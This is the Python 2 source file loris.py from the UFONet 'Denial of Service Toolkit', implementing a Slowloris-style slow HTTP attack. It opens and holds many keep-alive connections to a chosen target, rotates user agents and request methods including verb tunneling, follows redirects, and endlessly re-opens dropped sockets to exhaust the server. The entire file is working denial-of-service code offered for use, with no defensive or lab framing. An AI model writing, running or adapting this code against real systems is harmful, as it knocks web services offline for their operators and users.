loris.py 4.5 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. """
  4. UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import socket, random, ssl, re, urlparse
  10. # UFONet Slow HTTP requests (LORIS)
  11. def setupSocket(self, ip):
  12. method = random.choice(self.methods)
  13. port = 80
  14. if ip.startswith('http://'):
  15. ip = ip.replace('http://','')
  16. port = 80
  17. elif ip.startswith('https://'):
  18. ip = ip.replace('https://','')
  19. port = 443
  20. self.user_agent = random.choice(self.agents).strip()
  21. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  22. sock.settimeout(10)
  23. if port == 443:
  24. sock = ssl.wrap_socket(sock, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1)
  25. sock.connect((ip, port))
  26. if method == "GET":
  27. http_req = "GET / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
  28. elif method == "POST":
  29. http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
  30. else:
  31. http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nX-HTTP-Method: PUT\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n" # "Verb Tunneling Abuse" -> [RFC2616]
  32. sock.sendall(http_req)
  33. resp = sock.recv(1280).split("\n")
  34. for l in resp:
  35. if "Location:" in l:
  36. try:
  37. ip = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', l)[0] # extract new redirect url
  38. try:
  39. ip = socket.gethostbyname(ip)
  40. except:
  41. try:
  42. import dns.resolver
  43. r = dns.resolver.Resolver()
  44. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  45. url = urlparse(ip)
  46. a = r.query(url.netloc, "A") # A record
  47. for rd in a:
  48. ip = str(rd)
  49. except:
  50. ip = target
  51. except:
  52. pass
  53. return sock, ip
  54. def tractor(self, ip, requests):
  55. n=0
  56. try:
  57. for i in range(requests):
  58. n=n+1
  59. try:
  60. sock, ip = setupSocket(self, ip)
  61. print "[Info] [AI] [LORIS] Firing 'tractor beam' ["+str(n)+"] -> [CONNECTED!]"
  62. except:
  63. print "[Error] [AI] [LORIS] Failed to engage with 'tractor beam' ["+str(n)+"]"
  64. self.sockets.append(sock)
  65. while True: # try to abuse HTTP Headers
  66. for sock in list(self.sockets):
  67. try:
  68. sock, ip = setupSocket(self, ip)
  69. except socket.error:
  70. self.sockets.remove(sock)
  71. for i in range(requests - len(self.sockets)):
  72. print("[Info] [AI] [LORIS] Re-opening closed 'tractor beam' -> [RE-LINKED!]")
  73. sock, ip = setupSocket(self, ip)
  74. if sock:
  75. self.sockets.append(sock)
  76. except:
  77. print("[Error] [AI] [LORIS] Failing to engage... -> Is still target online? -> [Checking!]")
  78. class LORIS(object):
  79. def __init__(self):
  80. self.sockets = []
  81. self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
  82. self.agents = []
  83. f = open(self.agents_file)
  84. agents = f.readlines()
  85. f.close()
  86. for agent in agents:
  87. self.agents.append(agent)
  88. self.methods = ['GET', 'POST', 'X-METHOD'] # supported HTTP requests methods
  89. def attacking(self, target, requests):
  90. print "[Info] [AI] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]"
  91. try:
  92. ip = socket.gethostbyname(target)
  93. except:
  94. try:
  95. import dns.resolver
  96. r = dns.resolver.Resolver()
  97. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  98. url = urlparse(target)
  99. a = r.query(url.netloc, "A") # A record
  100. for rd in a:
  101. ip = str(rd)
  102. except:
  103. ip = target
  104. tractor(self, ip, requests) # attack with LORIS using threading